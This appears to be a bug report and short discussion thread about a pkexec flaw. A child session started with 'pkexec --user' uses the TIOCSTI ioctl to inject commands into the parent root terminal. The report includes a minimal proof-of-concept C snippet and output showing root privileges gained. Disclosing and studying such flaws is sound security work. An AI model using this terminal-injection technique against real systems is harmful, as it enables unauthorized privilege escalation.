When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.
$ cat test.c
char *cmd = "id\n";
ioctl(0, TIOCSTI, cmd++);
$ gcc test.c -o test
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# pkexec --user saken ./test ----> last command i type in
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)
You have to possess CAP_SYS_ADMIN to successfully invoke the TIOCSTI ioctl. That implies to me that pkexec is allowing test to execute with that (and possibly other) capabilities. If that's the case, you're merely running as root by another name.
Or you can pass that tty ownership check that's been in there seemingly forever... sorry for the noise.